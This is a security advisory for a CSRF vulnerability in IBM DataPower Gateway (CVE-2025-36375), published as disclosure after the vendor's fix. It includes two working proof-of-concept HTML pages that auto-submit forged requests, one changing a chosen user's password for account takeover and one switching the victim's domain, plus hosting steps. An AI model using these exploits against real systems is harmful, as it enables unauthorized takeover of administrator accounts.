CVE-2025-36375

Name

IBM DataPower Gateway vulnerable to CSRF

CVSS score

6.5 (Medium)

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Product name

IBM DataPower Gateway

Confirmed exploitable versions

10.5.0, 10.6.0, 10.6CD

Researcher

Maciej Włodarczyk & Michał Bartoszuk

Description

IBM DataPower Gateway is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.
A Cross-Site Request Forgery vulnerability that leads to an account takeover can be achieved by sending a GET request to /support.xml endpoint via CSRF. The endpoint is not protected against CSRF attacks and by default is used to disable/enable debug mode.
By changing the GET parameters in the request, it is possible to modify any property of any object to which currently logged-in user has access to. Therefore, it is possible to change password of chosen user by modifying its Password property.

Proof-of-concept

To reproduce the vulnerability:

Create a poc.html file and edit the value of objName field to username of any existing IBM DataPower local user. The following PoC will change a password of the user testAdmin to Test12345678!test123456789.

<html>
<head>
<meta name="referrer" content="no-referrer">
</head>
<body>
<form action="https://[IBM-DATAPOWER-WEB]/support.xml">
<input type="hidden" name="action" value="toggle&#45;property" />
<input type="hidden" name="class" value="User" />
<input type="hidden" name="classDisplay" value="whatever" />
<input type="hidden" name="objName" value="testAdmin" />
<input type="hidden" name="property" value="Password" />
<input type="hidden" name="propDisplay" value="whatever" />
<input type="hidden" name="toggle" value="Test12345678&#33;test123456789" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

Set up a HTTP server with a following command to host the poc.html file:
python3 -m http.server
While being logged-in as IBM DataPower admin user, go to http://localhost:8000/poc.html to trigger the CSRF attack. The PoC sends a GET request to:
http://[IBM-DATAPOWER-WEB]/support.xml?action=toggle-property&class=User&classDisplay=whatever&objName=testAdmin&property=Password&propDisplay=whatever&toggle=Test12345678%21test123456789

Image 1: Successfully triggered CSRF attack

The password of testAdmin user will be successfully changed. To confirm the account takeover, you can log in with the changed password.

Image 2: Successful account takeover via CSRF

To increase the success rate of the attack, an attacker can firstly change the domain of the victim from custom one to default domain via another CSRF attack with following PoC:

<html>
<head>
<meta name="referrer" content="no-referrer">
<head>
<body>
<form action="https://[IBM-DATAPOWER-WEB]/">
<input type="hidden" name="action" value="switch&#45;domain" />
<input type="hidden" name="requestDomain" value="default" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

Timeline

03-10-2025 - Vulnerability reported to vendor
01-04-2026 - Security advisory is published by the vendor
03-06-2026 - PoC published

References

https://www.ibm.com/support/pages/node/7268034
https://www.cve.org/CVERecord?id=CVE-2025-36375